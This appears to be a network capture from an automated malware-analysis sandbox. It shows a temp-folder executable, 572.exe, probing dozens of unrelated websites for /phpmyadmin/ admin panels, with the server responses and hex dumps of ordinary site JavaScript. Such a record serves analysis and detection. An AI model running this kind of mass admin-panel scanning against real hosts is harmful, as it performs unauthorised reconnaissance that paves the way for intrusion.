                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ame">Contact Us</span></a></li></ul></div></div></div></div><div class="container header-1-wrapper header-main-area"><div class="vce-res-nav"><a class="vce-responsive-nav" href="#sidr-main"><i class="fa fa-bars"></i></a></di
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 74 26 26 28 22 62 65 66 6f 72 65 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 62 65 66 6f 72 65 3a 22 61 66 74 65 72 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 66 74 65 72 3a 22 70 72 65 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 70 72 65 70 65 6e 64 3a 22 61 70 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 70 70 65 6e 64 3a 22 72 65 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 72 65 70 6c 61 63 65 5f 63 6f 6e 74 65 6e 74 3a 22 72 65 70 6c 61 63 65 2d 65 6c 65 6d 65 6e 74 22 3d 3d 61 26 26 28 72 3d 61 69 5f 66 72 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t&&("before"==a?r=ai_front.insertion_before:"after"==a?r=ai_front.insertion_after:"prepend"==a?r=ai_front.insertion_prepend:"append"==a?r=ai_front.insertion_append:"replace-content"==a?r=ai_front.insertion_replace_content:"replace-element"==a&&(r=ai_front
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC793INData Raw: 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 62 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 62 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 69 5f 70 72 6f 63 65 73 73 5f 72 6f 74 61 74 69 6f 6e 73 28 29 7d 2c 0a 31 30 29 7d 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 61 69 5f 70 72 6f 63 65 73 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent.readyState||"loading"!==document.readyState&&!document.documentElement.doScroll?b():document.addEventListener("DOMContentLoaded",b)})(function(){setTimeout(function(){ai_process_rotations()},10)});ai_process_elements_active=!1;function D(){ai_process
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1368INData Raw: 64 37 32 33 0d 0a 31 3d 3d 61 69 5f 74 72 61 63 6b 69 6e 67 5f 66 69 6e 69 73 68 65 64 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 69 63 6b 5f 74 72 61 63 6b 65 72 73 28 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 35 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 30 7d 7d 3b 0a 3b 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 6e 75 6c 6c 21
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d7231==ai_tracking_finished&&ai_install_click_trackers();"function"==typeof ai_install_close_buttons&&ai_install_close_buttons(document)},5);ai_process_elements_active=!0}};;!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC14994INData Raw: 58 6f 6f 6d 7c 48 52 49 33 39 7c 4d 4f 54 2d 7c 41 31 32 36 30 7c 41 31 36 38 30 7c 41 35 35 35 7c 41 38 35 33 7c 41 38 35 35 7c 41 39 35 33 7c 41 39 35 35 7c 41 39 35 36 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 45 4c 45 43 54 52 49 46 59 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 69 31 7c 69 38 36 37 7c 69 39 34 30 7c 4d 42 32 30 30 7c 4d 42 33 30 30 7c 4d 42 35 30 31 7c 4d 42 35 30 32 7c 4d 42 35 30 38 7c 4d 42 35 31 31 7c 4d 42 35 32 30 7c 4d 42 35 32 35 7c 4d 42 35 32 36 7c 4d 42 36 31 31 7c 4d 42 36 31 32 7c 4d 42 36 33 32 7c 4d 42 38 31 30 7c 4d 42 38 35 35 7c 4d 42 38 36 30 7c 4d 42 38 36 31 7c 4d 42 38 36 35 7c 4d 42 38 37 30 7c 4d 45 35 30 31 7c 4d 45 35 30 32 7c 4d 45 35 31 31 7c 4d 45 35 32 35 7c 4d 45 36 30 30 7c 4d 45 36 33 32 7c 4d 45 37 32 32 7c 4d 45 38 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Xoom|HRI39|MOT-|A1260|A1680|A555|A853|A855|A953|A955|A956|Motorola.*ELECTRIFY|Motorola.*i1|i867|i940|MB200|MB300|MB501|MB502|MB508|MB511|MB520|MB525|MB526|MB611|MB612|MB632|MB810|MB855|MB860|MB861|MB865|MB870|ME501|ME502|ME511|ME525|ME600|ME632|ME722|ME81
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 50 54 31 33 7c 53 47 50 54 31 31 34 7c 53 47 50 54 31 32 31 7c 53 47 50 54 31 32 32 7c 53 47 50 54 31 32 33 7c 53 47 50 54 31 31 31 7c 53 47 50 54 31 31 32 7c 53 47 50 54 31 31 33 7c 53 47 50 54 31 33 31 7c 53 47 50 54 31 33 32 7c 53 47 50 54 31 33 33 7c 53 47 50 54 32 31 31 7c 53 47 50 54 32 31 32 7c 53 47 50 54 32 31 33 7c 53 47 50 33 31 31 7c 53 47 50 33 31 32 7c 53 47 50 33 32 31 7c 45 42 52 44 31 31 30 31 7c 45 42 52 44 31 31 30 32 7c 45 42 52 44 31 32 30 31 7c 53 47 50 33 35 31 7c 53 47 50 33 34 31 7c 53 47 50 35 31 31 7c 53 47 50 35 31 32 7c 53 47 50 35 32 31 7c 53 47 50 35 34 31 7c 53 47 50 35 35 31 7c 53 47 50 36 32 31 7c 53 47 50 36 34 31 7c 53 47 50 36 31 32 7c 53 4f 54 33 31 7c 53 47 50 37 37 31 7c 53 47 50 36 31 31 7c 53 47 50 36 31 32 7c 53
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: PT13|SGPT114|SGPT121|SGPT122|SGPT123|SGPT111|SGPT112|SGPT113|SGPT131|SGPT132|SGPT133|SGPT211|SGPT212|SGPT213|SGP311|SGP312|SGP321|EBRD1101|EBRD1102|EBRD1201|SGP351|SGP341|SGP511|SGP512|SGP521|SGP541|SGP551|SGP621|SGP641|SGP612|SOT31|SGP771|SGP611|SGP612|S
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 5c 2d 73 7c 64 65 76 69 7c 64 69 63 61 7c 64 6d 6f 62 7c 64 6f 28 63 7c 70 29 6f 7c 64 73 28 31 32 7c 5c 2d 64 29 7c 65 6c 28 34 39 7c 61 69 29 7c 65 6d 28 6c 32 7c 75 6c 29 7c 65 72 28 69 63 7c 6b 30 29 7c 65 73 6c 38 7c 65 7a 28 5b 34 2d 37 5d 30 7c 6f 73 7c 77 61 7c 7a 65 29 7c 66 65 74 63 7c 66 6c 79 28 5c 2d 7c 5f 29 7c 67 31 20 75 7c 67 35 36 30 7c 67 65 6e 65 7c 67 66 5c 2d 35 7c 67 5c 2d 6d 6f 7c 67 6f 28 5c 2e 77 7c 6f 64 29 7c 67 72 28 61 64 7c 75 6e 29 7c 68 61 69 65 7c 68 63 69 74 7c 68 64 5c 2d 28 6d 7c 70 7c 74 29 7c 68 65 69 5c 2d 7c 68 69 28 70 74 7c 74 61 29 7c 68 70 28 20 69 7c 69 70 29 7c 68 73 5c 2d 63 7c 68 74 28 63 28 5c 2d 7c 20 7c 5f 7c 61 7c 67 7c 70 7c 73 7c 74 29 7c 74 70 29 7c 68 75 28 61 77 7c 74 63 29 7c 69 5c 2d 28 32 30 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 54854 | 104.18.41.153 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 172 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: app.plex.tv
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 342 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
CF-Cache-Status: HIT
Server: cloudflare
CF-RAY: 850abb7368b6139b-ATL
2024-02-05 11:14:53 UTC | 168 | IN | Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
2024-02-05 11:14:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 54622 | 23.4.32.216 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 202 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://steamcommunity.com
Content-Length: 0
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 52524 | 124.237.208.37 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 652 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:52 GMT
Etag: "62650964-3feb"
Logid: 8900799866678868342
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=28BC2B6ED4C1D9D9F81E1A842D564B3F:FG=1; expires=Tue, 04-Feb-25 11:14:52 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900799866678868342
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0XaisBS3b+qnFNveUfQhz9owpNwyaGzq/uEjV2eCc=
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-02-05 11:14:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.6 | 55086 | 44.233.131.115 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: cloud.simplify3d.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 216 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, private
Content-Type: text/html; charset=UTF-8
date: Mon, 05 Feb 2024 11:14:52 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 6854
Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.6 | 55113 | 172.203.148.34 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: eei.uniandes.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 162 | IN | HTTP/1.1 401
WWW-Authenticate: realm user=""
Transfer-Encoding: chunked
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: WSO2 Carbon Server
Connection: close
2024-02-05 11:14:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.6 | 55120 | 31.13.65.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 177 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 640 | IN | HTTP/1.1 302 Found
Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:14:52 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:14:52 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
Location: https://m.facebook.com/phpmyadmin/?_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: uiAyVLvOBUFjwR6vl2PYPW+TeOsGbTAat2zMEOGTrmZCusgwN6pTtBOzP2XT3FVS4oA1949ky4zskbgv7NO4Kg==
Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.6 | 55156 | 172.66.41.20 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: yellosa.co.za
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 606 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
location: http://www.yellosa.co.za/phpmyadmin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EONG5aygV9RhdauwGihGCQnRt2jYx5RWSU3dgU0u%2BOrQsNTA7b2DGjzoM%2BYCg7oAOCisO3t3f%2FiLwx9HGHvfi%2B00FsN5RnYgvfjhqqIzys9hrvzFohS962z63xi3iuId"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb74aada452c-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.6 | 55237 | 195.85.23.95 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 339 | OUT | GET /phpmyadmin HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 1145 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
set-cookie: bonga20120608=30715307f3f9ac614c681529737c9a10; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: fv=Zwx2ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: uh=FTyeK2gvLHWuqKM3Jay2MIE1sxkHFj==; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:14:52 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
referrer-policy: origin-when-cross-origin
x-ua-compatible: IE=edge,chrome=1
cache-control: no-cache, no-store, must-revalidate
x-zone: 3-reserve101-ded7160
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abb74abe06740-ATL
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC8INData Raw: 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.6 | 55495 | 31.13.88.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: th-th.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 389 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/phpmyadmin/?locale=th_TH&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: /PM00cu4eqFMSZba9J2ydQTi2PL4lmABZ0L+CgKZuuoHWu0XHStsauaCja1LzHO0qLv8vCQaYQF3MdJ7zDjWTw==
Date: Mon, 05 Feb 2024 11:14:52 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.6 | 54597 | 35.186.223.180 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sigapbanjarmasin.info
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 568 | IN | HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
accept-ch: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Google Frontend
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
Transfer-Encoding: chunked
2024-02-05 11:14:53 UTC | 309 | IN | Data Ascii: 12e<html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (25)</h3>
2024-02-05 11:14:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.6 | 54618 | 54.183.63.241 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 717 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=c617b93e76f68699718ceaa19a2de8d9; expires=Mon, 04 Mar 2024 11:14:52 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
x-imvu-rnd: WR2Gp0kA
content-language: pt-br
2024-02-05 11:14:53 UTC | 15320 | IN | Data Ascii: 3bd0<!DOCTYPE html>...[if IE 8]> <html dir="ltr" lang="en-US" class="ie8"> <![endif]-->...[if IE 9]> <html dir="ltr" lang="en-US" class="ie9"> <![endif]-->...[if gt IE 9]>...><html dir="ltr" lang="pt-br"> ...<![endif]--><head>
2024-02-05 11:14:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.6 | 55185 | 142.250.105.84 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:14:53 UTC | 1252 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UYY5r8wXuDXpllKBMbA9bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:14:53 UTC | 397 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:14:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.6 | 55137 | 185.78.166.130 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 203 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 229 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpmyadmin/
2024-02-05 11:14:52 UTC | 162 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


